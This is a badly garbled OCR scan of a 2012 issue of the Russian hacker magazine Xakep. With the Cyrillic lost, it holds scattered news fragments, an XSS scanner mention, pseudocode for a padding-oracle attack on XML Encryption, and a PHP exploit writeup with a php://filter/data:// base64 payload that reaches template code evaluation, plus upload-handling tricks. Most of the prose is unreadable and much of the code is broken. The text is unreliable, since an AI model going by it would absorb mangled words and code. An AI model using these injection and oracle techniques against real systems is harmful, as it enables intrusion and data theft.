Professional Documents
Culture Documents
01 [156] 2012
ANDROID
:230.
ENCRYPTION
XML-KOHTEHTA
.
,
----
PHONEGAP:
HTML5
(gam]land
hf.fun media
UJ = . - -
-; _ 0
n:1
iiiiiiiiiiiiiiio
-~ - N
-,rp.HEP
.....
~
lntro
nikitozz )) [nikitozfareal.xakep.rul
ctstep (steprareaJ. xakep .ru )
c(gorl (gorlum@real.xakep.ru )
PC_ZONE UNIS
(magglareal.xakep. ru l
. Klouniz (alexanderfareal xakep.rul
MALWARE SYN/ACK
UNIXOID
Step)) [stepffireal.xakep.ru l
xakep.ru
ccgol)) ( golumfaeal.xakep.u 1
(pofakumekay.com )
[ g igorievafaglc . ru )
i xafaeal. xakep . ru l
R-
DVD
ant)) ( antfareal.xakep.u l
ccAd ushock andrushockfareal.xake .ru)
01g 1>> levdokimovdsfagmail.com )
Ui-
Security - pae
ART
-
(aliklaglc. rul
: . : .
PUBLISHING
000 , 115280, ,
. , 19, n,
5 , No 21.
.: 1495/935-7034, :
1495/545-0906
no
. :
1495/935-7034, : 1495/545-0906
. , :
n TECHNOLOGY
( f il atovacl glc ru l
100%. ,
(olgae mlfaglc.ru)
250 ,
. ?
, , :
,
. - .
. :
1-3 ,
- . ,
/korenfeldlaglc.rul
: >> ,
. ,
, nn,
,
- .
, .
, : .
,
, , .
n :
/alekhinalaglc.rul
(polikarpova@ glc.rul
( ]
(t a t arekova@g lc .ru l
/gospodinovataglc u l
(dubrovskaya@gjc.ru/
(bulanovalaglc.rul
l koshelevafaglc. u )
llepikova@qlc.ru ]
llukichevafaglc.ru )
V- : claimfaqlc.ru .
n : (4 95)545 -09-06
nn : 1495/663-82-77
: 8-800-200-3-999
:
101000, , , / 652,
115 !
, , -
77-11802
14.02.2002
. :
n . , n
, .
nikitozz, rn. .
shop.glc.ru/xakep
vkontakte ru/xakep mag
01/156/201 2
- n.
: co n tentrglc.ru .
000 , , 2012
001
OMOHKASIRI
004
HEADER
004
MEGANEWS
016
017
Proof-of-cocept
011
hacker tweets
-
SS-
Dropbox AdWords
100
COVERSTORY
030
Adobe
COVERSTORY
COVERSTORY
018
L
Encryption
036
PCZONE
UNIXOID
hnG:nL5
102
107
Linux
042
Windows-apoe
tcpdump
Widows-cce
046
112
did-
Widws-?
117
Ubuntu 11.10
Oneiic Ocelot
050
Easy-Hack
054
SYN/ACK
118
060
D5
064
122
- SpyEye
068
Lotus,
072
126
X-Tools
130
--
132
MALWARE
080
Wi32/0uqu: Stuxet
084
bootkit test
088
.N-
.NET Famewok
094
098
NAS
5- 6- NS-
Silicon
074
FERRUM
PoweSP060GBSSOV30525
PHREAKING
Loop
, n
n n
136
FAOUNIED
139
142
WWW2
FAQ
8.5
w-
144
2012
NY2k+ 12
EGANEWS
I
<< .
UBUNTU
SIRI
OMOHKASIRI
UBUNTU 06
n n
iPhone 45
Applidium
111
~.)
'.1
" On 19 rem1n d me
l's dad's b<rlhday "
'~ ~:J' r1
1'3 -cL 1
,(!
rJer '::,r
111
5ii,
i05 5.
n ,
n
. ,
19
Saturday
2012
n 5ii n
. -,
Oad's brrthclay
Andoid,
n 5ii
r;
~ ''1'
iPad.
"
cack i ng si i .
:
iPhone 45
Canonical,
Debian,
Ubuntul , Ubuntu
n -
, n .
5. n 5ii
n , R- .
, n n
no
iPhone 45 .
Canonical ,
Windows 8, n
n\n,
. n,
. ,
. ,
Applidium
n ,
Sii
.
n, .
>>.
iPhone
Apple . n,
, n
n << n>>.
Canonical n
Ubuntu 12.04, n n
2012 . , L5-
[ n),
Windowsxp
WINDOWSXPCTAJIAKCO
APPLE
(CHRONOPAYI
, STEAM .
I .
. ,
! -
comScoe,
, -
, n
DDOS-ATAKY (Assist),
50,81
<<>>.
Steam.
001,
01/156/2012
ltel 11 11 -11 11 11 11
, .
ltel 2011 . . ltel, ltel, ltel . .
* .
MEGANEWS
& F , 600 .
POLAROID
DNS
, DNS-apeco.
, ,
-
n.
DNS -
2008 n
Polaoid
,
w
11-
Google n
n Google Defender, n
.
, ,
27-
Polaoid
n
n ,
, 11-
n DNS-cepepax
n n
, DNS-.
, , n
Ghost Click .
Polaroid
Z340
ZINK
, n
DNS Changer.
OS
DNS.
I- n 15
Windowsoep
n . ,
! ,
n >> , .
, n .
n ,
. , , n
,nn
n .
n .
2, 7"
14 Mn.
100
, n
500
[ n], n
SD .
I 43 ] F/3,2.
[ -1280 720 n ]. Polaroid Z340 n
76 102 , $20 30
<<
. - ,
no
25 n.
14
, << n n
. - [ - ]
,
, DNS-cepepa
Rove Digital.
- , n .
, .
- ,
, .
AVIRA
AESCRIPT.DLL
006
EstDomains-oeoro ,
nn , .
2008, n
ICANN
n .
n
22
85 r~ .
01 /156/2 01 2
MEGANEWS
, CONSUMERIST, RIAA .
, WI-FI,
.
,
1.6.4.
. ,
, .
,
,
.
, ,
,
.
CMS,
, .
, , ,
. ,
6 ,
1.6.4,
, ,
. -, ,
10 ,
/GS. ,
, , ,
, 802.11 .
-,
. , ,
iPhone45,
[ 100 ),
802 .1 1, .
, .
, ,
[CDN) .
Apple n
- :).
.
, - ,
- .
,0-'--~
- - - -
., ,_",,.,,..
. , - ,
. ,_,.
__
(<~
....... , ... , ..
'<I';J
..~.....,<Jo
"' I" O.""*'nr l """ "' '" ''' '"""" "'
--~ ' """"" " L>oo< , "' - ! r.=oo _ _ ,,... ..
1 . ,.... .
Jj
._d
.....
008
. 4
( 32
microSDI ,
, ;
~
KaneOIAII~
F. -
<< ,
GGL!~~ -,
lterfilm.ru
1500 mAh, ,
Big
WEXLER.BOOK 7001
Microsoft.
Puzkarapuz.ru .
: 5 990 .
Firefox.
01 / 156/201 2
t'
' !..'
' ..;;.
'
<~ t19.
.f
~~
~-
. , ....... - . ...
- - . .l . ~;
.,
'
'
1.
1.
j ll_ ~:-~<. 1 .
~< , 50%
: : r.- (495)-663-82-771 shop.glc.ru
MEGANEWS
ENTENSYS COMMTOUCH , 6, 7% n .
,
>>
.
YouTub e
:
Aoymous
[Zetasl
. , >> ,
, >> ,
. ,
26 2011
- . ,
- .
-.
Anonymous
- ,
. ,
,
, -
>>
, ,
. , OpCatel [n
~. ,
, ,
,
.
, , -
OpCatel .
.
.
, ,
, , .
Lolita City - ,
100 .
F e edom Hosting,
Anonymous n
. ,
S- .
,
. n
2000-6000
.
. -
SQL- .
, , ~
Feedom
Hosting . ...
: F eedom Hosting,
40 ,
38
n:
<<IT
.
,
>>
010
01 / 156/2012
laEdiStrosar:
laiLLUMINATI:
laRuCTFE:
>> [
OldEuOpe
#RuCTFE
RWTH, ,
t.co/IUII94Ko .
l.
1!!!1 :
lilil CTF
ciWeldPond:
cljkouns:
. Ggl--
Google,
OllyDbg
_noRE.exe
IDA
ciStephenwest:
1!!!1
lilil
-. :1
, Google
Wi-Fi,
_nomap. :1
...
clinsitOr:
ciRogunix:
DS/-
ICMP efCount
TCP/IP [MS11-083I 232
UD-, , 250
Oday BIND.
4. lf
How to do pentest:
1. Daw line with .
2. Check line.
3. lf visie, woks .
line, does not wok .
1!!!1 :
lilil - .
pentest?
1. [) .
2. .
3. , ,
4. , ,
.
.
DNS- cepepa
BIND,
DoS Oday.
52.
t.co/aY.PCMyRy.
lafjserna:
Micosoft/MSRC .
!
Google.
Shodan
++.
Siemens Simatic.
t.J;o 1l1Q0b3cq .
cljduck1337:
1!!!1 :
lilil . SCADA-
: bash: ./:-
. S-
- .
1!!!1 :
lilil -
,
,
. !
cljOOru:
clmikko:
-
Windows [NT/2000/
XP/2003Nista/2008/7/81.
: .. _o/oBiJ;17 .Q .
: << .
#wostpasswod
1!!!1
lilil
. ?
01/156/2012
:1
011
( 926 ), ,
MEGANEWS
Nito,
lociJtionofinfected computer s
tioUIIpi8CIIIftlleM
, n
? ,
, .
n ,
.
PC.WNieO.US,...IJ
.,_ICWIIIcll'rlllf.
~llwpop~
- VideoGhost,
. ,
, .
ol~oi!Wpail~
IO'f2~htountry
,...,.
loulwdCIidlotor&D
fiOclns' l'lt.........IOif
,_,.,otortcrn-
, [
-- 2 ] .
VideoGhost
,
US-. US-
n - ,
.
US-,
Stuxnet, , -
n , n .
cVideoGhost .
VGA, DVI DMI,
$200.
, ,
Symantec. ,
Nito,
n ,
29 19 ,
[,
]. n ,
n. -
,
Poisonlvy].
, .
Symantec ,
. Nito :
, .
&
& BSUP a
GGL,
FACEBOOK.
&
Tusted Fiends
Andoid ,
ICANN
<<.
no nn
012
18,7%,
Mini,
13,1%.
01 /156/2012
HAANDROID'E
BITCOIN
BITCOIN
BitCoin
n .
,
, . ,
n
Mt Gox,
BitCoin,
, . , BitCoin
FXI ,
The Cotton
Candy
$200,
n
2012 .
,
cWindows 8
.
, ,
, n
.
lntego,
Devii Robber,
BitCoin .
.
,
, ,
, ,
Bi tCoin,
DeviiRobber
05 ,
n
.
The Pirate . ,
Graphic Converter 05 .
FXI
[ - << >> ,
n
,
. ,
21 , , ! .
itin - ,
U5-,
. R-
Bluetooth, HDMI2 .1
Firefox,
5afari
Vidalia-
TOR.
U5B 2.0. ,
n 1. h Cotton Cand y
Android 2.3.
, , ,
Wi-Fi
. De vii R obberae ,
Android.
, ,
BitCoin
Oper
HDMI, U5B [ n
!. Bluetooth ,
Microso ft n ,
. ,
Android
Market,
BitCoin.
: 1 n
2, ,
50 , 1
, GOOGLE ?
, n ,
.
,
SSID
, n ,
Bi tCoi n. -
n
,
<<_NOMAP>>,
n , ,
01 / 156/2012
, .
, .
BitCoin, :
- >>.
013
MEGANEWS
LINUX3.1, kl . g .
CTAHAADOBE
FLEX
FLASH
,
,
, , n .
, , , n
.
iSpy n
100%.
, , n
iPhone ndid
n n
- !
,
.
n ,
d Flash n
60
n ,
90% .
. n n
n . n , ,
750
( 7
n n .
% n!
n DSLR-aep n n
n .
12 . iSpy
magnifi ed key n -
dobe n n n
Fla sh l . Fla sh
n n
, n n
Adobe Al R
n n.nn
Android
PlayBook, n
Flash Player
n .
n n
n
HTML5. n
n , n
n
Apple,
Flash . , , n
, n-n
, n
AMAZON
GGL
Shdd Challenge
, 2012
, .
47
DARPA
50 .
011.
42
01/156/20 12
500 Wikimedia.
IPHONE
~~>>
iPhone Dev-Team
n
. ",--"
iPhone4S.
.
n,
,
.
iPhone 45
. Chonic
DevTeam iPhone
. , , ,
iPhone,
& , .
, , ,
, iPhoe
:
45, iPhoe
iPhone 4 iPhone 3G5,
. ,
,
>> . , ,
. :
51 -
& , ,
,
. &
! >>, >>,
, l.
, -
youtu.be/gofpeiTXI5U. :
&
space
1611)
<< >>;
51 - &
T-Mobile;
, Wi-Fi !
<< >>,
<< >>;
);
<< >>,
<< >>;
iPhoe ;
<< >>;
EDGE
51 -,
51 - T-Moile
. ,
<<
20-30 ;
iPhoe,
<< >>;
MCAFEE:
75
01 / 156/2012
015
.HEADER
Proof-of-Concept
SS-
100
, .
, SQL-,
, ,
. , ,-
map,
sql-
SQLi
. ,
SS- . - .
XSS
. Coss-site scipting
SS- -
[XSS]-
n.
GET-
S-
SS-,
n , n
n- n , n
n JS-.
-n
Scanne
n .
-, .
SS- n
n L-
n GET/POST-anpoca .
- , ,
n, n
[
] ,
-.
n .
n- n.
n n
n,
> -
SS-.
SS-n. ,
-n
n . n ,
DS XS
. ,
. -
. n,
n,
L- <scipt> .. </scipt> [ n
] ,
n JavaScipt-o. ,
n, n
n n],
DSXS
n [
. ,
> n n JS-,
<scipt> ...</scipt>.
n. , ,
n n
n XSS
zero.webappsecurity.com
016
DSXS
Use-Agent, Rf
, n SS
n GitHub [https:Ugithub.com/
stampam/DSXS ]. ::
? n
Python,
Cookie
- .
01 / 156/ 201 2
HEADER
10 DROPBOX
ADWORDS
10
[ ] :
, , ,
1. << >>.
2. [, D].
3. ,
50
. -
$99,00 . ,
[, , ,
, ].
3.
>> : ,
600
250 . ,
1 , ,
- . ,
.
>> ,
, D,
-.
: d, f oline stoage,
f,
online backup
, - ,
, D -
- , ,
URL
, ,
[, it . ly/ud69i ]. ,
Google.
space.
. ,
D Refeall Status [,
httR:Udb.tt/UfxuFBm ]. , .
10
, D
. AdWods !
,
, .
,
. ,
[Cost-Pe-Ciick].
[ it.ly/xNKyB ].
. -
D- .
, ,
, .
? , ,
? - ,
. - . ,
D. -, .
:]
AdWods,
-, AdWods, , ,
?,,- . ,
Google]. . :] :::
! ,
Google,
1000
. .
Qit.
l y/AEsg1 $75
AdWods, ,
.: ] ,
e-mail [
- ], [
-
about.me], .
e-mail.
Updated
Statu.s
,.
3/26/ 2011 6: 52
3/ 26/ 2011 6:37
Jo ined
Completed
Jo ined
3/ 26/2011 6 :08
Jo ined
3/ 26/2011 5:23
Completed
Completed
3/ 26/2011 4:49
Completed
3/ 26/2011 4:32
Compl eted
[ ] .
?
? , ,-
-7
>> .
[ ,
, ],
01/156/2012
- 250 Dropbox
017
COVERSTORY
Encryption,
XML
L-.
XML ENCRYPTION
www.w.org/TR/
mln-r/
Framewok "ax [ n
XML Encryption
w .
bit l/u
r
XML
Encryption.
XML Encryption,
2002
XML
.NET, Apache Axis2,
JBOSS . .[.
-
n,
Microsoft
Encyptio n n
XML
Red Hat.
,
L- ,- ,
L--
. n
, n
nn , - CBCI.
018
, n
AES
DES . n
AES [
01/156/2012
ISJ*iiirIId
, n
XM L En cypt ion
16 , 128 !
. ,
,
.
n ~ .
IIVI,
XOR,
.
,
IV1[0]
//
[0]
C[ i]
//
[ 0 ]
M[i]
k-
, - , - ,
IV-
ll.
Attack.
BEAST
P addig
. .
, , :
XOR
IV
. ,
12
Dx05. ! 16 !,
, 15
MSK,
, 16- 10.
. ,
XM L En cyptio.
XML
En cyptio
, .
, , ,
ASC II .
ASCI I
, NULL ! Al,
! Bl. ,
, ,
>>. ,
, n
. ,
,
16
tue, [) =
AES_DEC _
CBC[k, IIV, C[OJII NULL, false -
.
, ,
.
:
1.
IV1,
[I V1, C[O] I .
niV,
lniV, C[O]I . tu,
false .
! !
01/156/2012
IV1
= iV,
019
COVERSTORY
WS-SECURITY
WS-Security -
SOAP, _
-. WS-Secuity XML Encyption XML
Signatue.
2-3 ,
, ,
2.
. [] ,
! .
[0].
XOR []
IV.
[, AES_DEC ,
msk =
repeat
XML
XML ENCRYPTION
msk++
IV2 = IVl xor ( . .. e llmsklle ... )
11 msk j -
XM LI
XML
, < >
[odel.
until Server((IV2,
[ ] ))
==
, ,
true
11
"
[
, . .l
Iput:
XML.
Output:
j-
< >
&
& >>.
XML ti.
W XML Sigatue W
XML ti, XM L
[]),
s-
XML
C=(IVl,
XML
retur
X[j]
= AES_D EC(k, [])
XML
ti,
. ,
[ , , . . l .
. j-
, ,
j-
<CipheValue>, ,
, .
. , ? : .
<EcyptedData>.
!:
,
,
AES_DEC_CBC(k, (IV2,
IV2 xo r [].
[]))
[])
. <CipheValue>
<?xml version= ' 1.0 ' encoding= ' utf-8 ' ?>
<Enc r yptedData Type = ' http://www.w.org/2001/04/xmlEnc#Element ' xm lns = ' http://www.w.org/2001/04/xmlEnc ' >
<Enc r yptionMethod Algorithm = ' http://~~.w3.org/2001/04/xmlenc#aes128-cbc ' >
</ Enc r yptionMethod >
<Keyinf o xm lns = ' http://www.w.org/2000/09/xmldsig# ' >
<KeyName >Jo hn Smith</ KeyName >
</ Keyinf o >l
<Cipher Data >
<Ciphe r Value >A123456 ... </CipherValue >
</Ciphe r Data >
</ Enc r yptedData >
020
XML Encryption
01 / 156/ 2012
XM L
E ncyption
n n ,
<EncyptionMethod>.
n n n,
n L- .
, L-,
. ?:-]
XM L ti
v Secuity,
n n
. ,
L- !
XML], n
. n
. . ,
n <EncyptedData>. n td
!, , -,
Element -
, L-
, . ).
. Encypted
-,
Content
, .
, . . n Encypted
,- -.
Text
Contet,
n Encypted Contet,
Paddig
l-,
. , n n
Oracle Attack,
Axis2,
ASP.NET),
.net.
. , n
XM L Famewok'o
n .
- .
UTF-8,
XM L E cyption
n n
, .
,
S-.
, n
XML
. n
Receive,
UTF-8-
, ,
lline feed ]
lcaiage tu]. , n
ASCII
Dispatch . Message
message flow
SOAP n ,
UTF-8.
n,
ASCII
128
Axis2 . :-]
! 4]. ,
,
AXIS2
- ,
Axis2.
,
tue
n n
-. nn
secuity
Apache Axis2
Famewok,
XML
Encyption
false
. n
1.
fault.
secuity
fault
XML
. , ,
SOAP.
Axis2
Famewok, n
? , n
001
S- ! ],
OxlO,
n n
n ,
2.
n n. S-
n, n
n>> ,
Message
Receive, , ,
Sevice n .
, D - , ].
: st, Secuity
Axis2
Dispatch . Secuity,
- L-
, &
XM L SIGNATURE
n ,
XML Signature -
n W.
ASCII !
]. n n
n >> <<& >> < >>,
n n n
XML
01/156/20 12
XML.
021
COVERSTORY
. ,
, , ,
, 16-
, tue
false.
, <<> S
, . ,
fault, false .
fault ,
, secuity
, L- :
10
Handlers (intercepters)
))
, L-<>,
</>.
2
<<&>>,
<<>.
. [FindiVI
. ; [IV, [1], ... , C[d]l
s-,
i, << >>
(;[iv, C[i]l.
secuity
fault,
, ,
, .
[FindXbytel <<n
>> [
FindiVI j- X[i][j]
X[i]; AES_DEC[k, C[i]l. ,
.
.
.
[ 1 ),
'
C[d))
M[d))
.
,
C[i] C[i-1].
,
for i ; 1 to d do
iv ; FindiV(C, i)
for j ; 1 to 16
ASCII [
UTF-81. ,
, n
,
Dx01 [
!.
end for
return ([ 1 ],
'
M[d))
.
,
[ ,
! .
:
--
FINDIV FINDXBYTE
FindiV n
, , ,
W n web-sevice n ,
n n n
FindiV FindXbyte .
machine-
- .
to-machine-a . n n
n - n
, , ,
. n
, ,
: <
, nn n
01 .
IV,
!,
- , , ,
fel. n
n n
, , <<
n , n .
022
. . n
FindXbyte. n ,
f-3 .
01 /156/2012
Dec.
Char .
Block
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
NUL
SOH
STX
ENQ
07
08
09
BEL
BS
LF
VT
FF
CR
OD
so
OF
SI
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
20
21
22
23
24
25
26
27
28
29
2
2
10
11
12
13
14
15
16
17
18
19
DLE
DC1
DC2
DC4
NAK
SYN
CAN
su
ESC
FS
GS
RS
1D
1
us
1F
Dec.
"
&
'
(
)
-'
2D
2F
1
Block 3
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
1
2
3
4
5
7
8
9
:
;
<
3D
>
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
40
41
42
43
44
45
46
47
48
49
Dec.
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
F
G
4D
4F
50
51
52
53
54
55
56
57
58
59
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
Q
R
5D
5F
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
Char.
60
61
62
63
64
65
66
67
68
69
Encyption
'
i
j
k
6D
m
n
Block 7
lock
Block 5
30
31
32
33
34
35
36
37
38
39
Char.
lock
SPC
Block 1
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Char.
Block 2
00
01
02
03
04
05
Dec.
XML
70
71
72
73
74
75
76
77
1
}
78
79
7F
DEL
7D
ASCII
. - , n
-, -, n
[ ,
. n
-, ,
[ ]. , ,
XML 5chem'
n. ,
, ,-
[L-]
, ,
. , ,
[, 150/IEC
n
, , ,
19772:2009],
051 [n
, XML Encyption 55L/TL5,
n 5] .
. ,
,
XML
Encyption . , ,
[ . ],
u .
,
,
n , n n
n . ,
XML
5ignatue.
, n
XML
5ignatue
Wappig, , n
XML
epic fail .
Encyption
side-channel,
, -
, n . n
nn / .
n- ,
, n n
n n .
. ::
01/156/2012
023
$ FILES
,
'-"
il . ly/sfDcys
noce
L ightig
,
,
Template.
4.3
. [
blt.ly/ttvWV -
, . . l <<
LightningTemplate.
it.!y/mdrdqf
ca,
File path
injection.
pastebln.com/1edSuSVN
- n
>> .
.
,
, .
,
:
File path
injection.
it . ly/g6ztD -
$_FILES.
':,~qt\0~
-____... ,.
contents
fopen,
~~
file_get_
. .. ....
.....__llriWolo,..,
1....... - .
. .
,..
- tM kLU I ~>laLO""
--.1-.....
n.
~ r .,...
'!"lt1
<~
t - L rLI (r.-o. .u
8~LIUI
' I - - - 1 8UI--Oil
cL-
: , -~lojlaiJ
IIIp_t_I...., _II i r c tlld.o ..._...,r_Hiter
n .
01 / 156/2012
i f ($closi ng) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);
' w' );
POST, Base64 :
Secure [9ist.github.com/600388/cd99ae03c3
<head>
<meta cha~set= "utf-8" />
<tit1e>{{ tit1e }}</ tit1e>
</head>
<bodY>
<h1>{{ tit1e }}</h1>
< > 11 {{ name }} </ >
1
< > {{
meagelafe
}} < / >
<u1>
{% fo~ ite!il in ite!il %}
{% i f ite!il %}
<1i>{{ ite!il }}</1i>
{% endif %}
{% endfo~ %}
</u1>
</bodY>
</htm1>
, .
, ft-,
gz-,
:
sample.php #
= Off >>
RFI.
< ?php
require_once
'Lightninqemp1ate.php' ;
--
S- :
~ite!ils
= array(
,
-
. !
lG
'piyo' ,
) ;
);
echo $lt ;
, , ,
. -
. ,
12.
< ?php
. ,
require_once
filte !
] .
, .
te!ils = array (
'hoge' , null, '<b>fuga</b>' ,
$1t = new
private $_data;
, $closing
TRUE. :
01/156/2012
'piyo' ,
);
'Lightninqeiilp1ate . php' ;
Lightninqemp1ate(
'amp1e.htm1' ,
1
1
new
);
Lightning Template
025
COVERSTORY
if ( !empty ($t his->bucket - >data))
stream_bucket_a ppend($out, $th is->bucket);
return PSFS_PASS_ON;
}
,
PSFS_PASS_ON.
include ( "./LightningTemplate.php" );
$lt = new Light ni ngTemplate(' . / sample.html' );
$lt->title = ' Title' ;
echo $l t;
L-:
. .
:
L- . ,
include,
, ,
- ,
, .
. ,
Google Code
Seach.
steam_filte_egiste.
L-. :
Lighting-Temp l ate !
!, . ,
sample.html:
puic
'1\{%\s+if\s+(.+?)\s+%\}/e' ,
<html><t:Lead>
<met a charset= "utf-8" />
<t itle>{{ tit l e }}</t it l e>
</ head> </html >
);
$replacements = array (
'"<? php i f ('. \$this->condition($1). '): ?>'" ,
2
3
4
5
9
1
11
12
13
14
15
16
17
18
19
20
21
7
8
. , ,
}
/* n /
g_l
puiic
. ,
function
fi~er($ i n ,
{
/*
.,
while($bucket =steam_bucket_make_writeae ($ i n))
{
$this-> data .=$bucket->dala;
$this->bucket = $bucket ;
$consumed = ;
/*
( ukt).
.,
if($closing)
{
$consumed
$st
+= stlen($this-> _data);
= nl 2 b( $bucket-> _data};
if(!empty($this->bucket->data))
steam_bucket_append($out ,
PSFS_PASS_ON;
$this->bucket->data =$st;
$this->bucket->datalen = stlen ($this -> _data);
etum
'$_data'
026
'"<?php if,
. ,
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
);
$bucket->data = preg_replace($patterns,
$replacements, $b ucket->dat a) ;
$this->bucket);
S-
file :
Fs bCgpKSAlfQ
,
,
, ,
01 / 156/ 2012
-----------------2421143186617
S- :
----------------------------- 2421143186617
-
php_use_filte.
: filte, t, oCiose.
filte, :
1.
$i - , ,
<< , .
2. $ut- , ,
<?php
----------------------------- 2421143186617 --
3. $cosumed- , ,
4.
, .
$closig- , ,
- ,
TRUE,
phpseUm44, hello.txt.
,
filte
).
1. SFS_SS_N-
$_FILES :
2. SFS _ FD _ - ,
$out .
3. PSFS_ ERR_FATAL ldefault) - pooa .
[t/is ,
. !,
), t,
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_ name] => /tmp/phpseUm44
[error] =>
[size] => 33
. t
FALSE
TRUE . o[lose
! ).
,
steam _fil te_egiste.
, $_FILES[uploadfile][type]
Cotent-Type, .
, -,
, :
. , ,
.
tl
move_uploaded_file, .
getimagesizel). , ,
, , . .
, IF-
, .
- . ,
. , -
, ,
pic.php.myext -.
, -
,
L-, :
,
.
, $_FILES.
, ,-
.
bugs . php.et ,
, - .
:) ,
Upload, S
/ ,
, Cotent-Type
$_ FILES [ uploadfile]
[name] . ,
,
01 /156/2012
-. Uni-
027
COVERSTORY
-
. Windows-aax n
.
.
.
$_ FILES.
Qwaza d o t.og .
BlackFan, , ,
.
. , ,
- $_FILES :
echo "Ok<br/>\r\n" ;
copy($_FILES[ " file" ][ " tmp_name" ][$key], 'test-txt' );
$_FILES ( ,
) .
, .
( upload.php),
}
}
L-, secet.
,
1.
secret.php,
(, , <?php ?>).
~-::
class
'li~t./SocJr:~t/i!lt:ta.php' ;
St.reaa_Filter_iarr.socJtet
2. , <<1 >> .
<< 1 .
extud8: ._,_.er_tilter
(
t
PIUVJISG - :
J. ;
t. UOict
,
:
prot.ect.ec1. $tiarta:
proucted
$ht~;1 ;
protected. faock 1;
wld.le
( liUcket
streaa_uc.ket_uke_wteale ( Hn ))
, .
.....,
PRIVJISG:
1ith1s->t.io.z:t:a->sessaqe (ftha->chonnel ,
lt ::
'ucket->date );
, ,
Content-Type (, ) .
n ,
:. lt: : NOICI :
defa.lt :
lithis -> tiarra->nouce:l!essaqe ( lit.hi.s-><:h~l .
liucke:t->da.ta l:
test .txt. !
"....,
<<
licon:sua!:d -
Sbuc.t:et- >do.t..a.le:n;
streaa_ucket_app~d ( ,out,
'uctet);
move_uploaded_file .
. (, ,
, )-
/"
r:il r i nitiali:r:e:r
imageceatefom*/image *.
@retum bool
, , ,
'1
.-uc h8ctioa o.c:reu.e ()
. ,
HJus- >channe.l -
);
JPEG,
U
( 1.ss~ t(~th1s->par~ [
Sth1s->ted~
aobl' JI) (
1:
IF- .
, -
onCeat e n
028
. , ,
01 /156/20 12
. ,
,
.
, imageceatefom*
,
, l
, .,
2009 ,
, . ,
, G-
base64_ecode ,
, , :
!.
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64J" . base64_encode(
. , L
isql_result_array( 'imagedat~]));
imagejpeg($jpegimage);
,
, .
,
,
<form action=>
<input name= "goodvar .(" >
<input name= "goodarray(foo)" >
<input name= "badvar[ [" >
<input type=submit>
</form>
. ,
,
index.php :
, -,
,
, ,
<?php
print_r($_GET);
?>
imageceatefom*/image*, :
:
Array
(
[goodvar_] =>
[goodarray] => Array
(
(foo) =>
}
(badvar _ _ ] =>
l.jpg ,
, ,
S- Contet-Ty pe:
php ~//filter/read%3dconvert.lightning_template_filter /
Array
(
(goodvar_] =>
(goodarray) => Array
(
[foo] =>
reso_urce%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
,
! , ,
, imageceatefomjpeg .
(badvar_ . [] =>
,
,
.
, .
$_FILES,
.
Y~.tlity
FI'OO'I:I:korowkzlt gnaldotc:om
status:Ciowi
PP\IeniOrl : 5.3.6
ln RfC1867 file
~ fllen'le
dd: 2011--13
21 :48 UfC
Mllgned:~
P4dl.age: ~
OS:rnlevtt
CVE-IO:Zilli..:.ZZOZ
, .
, - ,
n
01 / 156/ 201 2
, , . ::
029
COVERSTORY
S,
&
. .
- : n:
~~ n.
E\comsoft.
- Defcon .
r.t
.... ,
IT, , ?
il !
~ . .- . ][J,
, 6. -
100 .
20
. ,
- ... , ,
- ,
. -
.
.
,
- ,
. ,
, - ...
<< ,
.
, , . <<>>
<<
4,5
6 .
91- .
,
,- .
,
. - , .
COVERSTORY
, ,
Elcomsoft,
, , ,
. ,
. , ,
, . :
, :
<<, >>.
, ,
. n
. -
, .
... .
r.1
APPLE
.:;.t ,
,
, ,
r.1
, .
.:;.t ELCOMSOF
ADOBE
?
l ,
l ,
~ ,
compute foesics.
, ,
~ ,
passwod v, ,
- ,
. , ,
, ...
Apple
. , ,
, .
, .
, ,
Recovey . -
[ 97- !
. ,
compute
Active
EFS
diectoy.
r.1
. . . PDF
ELCOMSOF ... ?
foesics . ,
pdf .
~
, ,
. : << , ,
>>.
IT.
80 %.
l ,
. ,
.
,
,
r.1
.:;.t ADVANCED
PROCESSOR,
, -
2001
DEFCON?
l , . ,
~ ,
<<
>>.
. :1
df-, .
, Defco
2001
, - .
1 ,
2001
~ ,
, - .
- .
, .
, ,
. ,
, <<
. 90-
, .
>>. , ,
- ,
Defco.
, ,
, .
, ,
, ,
ELCOMSOFT.
r,1
Elcomsoft,
12
20
Adobe.
, <<
Def co ,
.:;.t >> .
Advaced
1 .
1 , , , ...
. ,
~
Access, . ,
... .
~ ,
, ,
, ,
Apple, iOS [ ,
iPhoe 45 iPad21.
. -
, .
, -
, ,
032
eBook
ss,
? :1
01 /156/2012
. ,
.
- , .
, , ,
,
, .
- .
r.1
1.;.1 ? <<
>> ?
l _ .
~ ,
,
21
.
,
11
-,
,
.
,
. -
, ,
, ... ,
. :) ,
, - .
,
. ,
,
.
- .
, - ...
, .
r.1
l , ... ,
, ,
1.;.1 ADOBE
. ,
, .
. ,
l , , -,
, , .
~ Adobe
!, ),
. <<>> -
Adobe,
Adobe
, -
-.
, , .
, : <<,
<<>>. ,
, , >> .
, ,
- ,
: <<n>>,
. ,
, ,
, , ,
-,
, .
11
. .
, -
r.1
, .
, ,
Elcomsoft.
1.;.1
, ,
<<
, , .
<<n
>> .
, ,
. .
. :
, ,
l ~
<<, >>. ,
~ ,
, .
- <<>>.
01 /156/2012
033
COVERSTORY
, .
? ,
, .
- ?
n. ,
, , , ,
l .
. ,
~ .
. ,
, .
, -
Hackes Oevelopes
>> >> .
, .
r.1
. . . ?
l , l -)
~ 50
, Elcomsoft.
Laten,
Kit,
Canon
n ,
.
CONFidece
, ,
Magic
r.1
~-
2.0.
Niko
. lus-)
, .
. . . , ?
, .
, . ,
.
,
l ,
, . .
. .
, -
, .
r.1
6 ,
2001
2002
. ,
5-10
. . . ,
,
. ,
Nikon
r.1
. . .
.
l ,
~ , Pactical
! ),
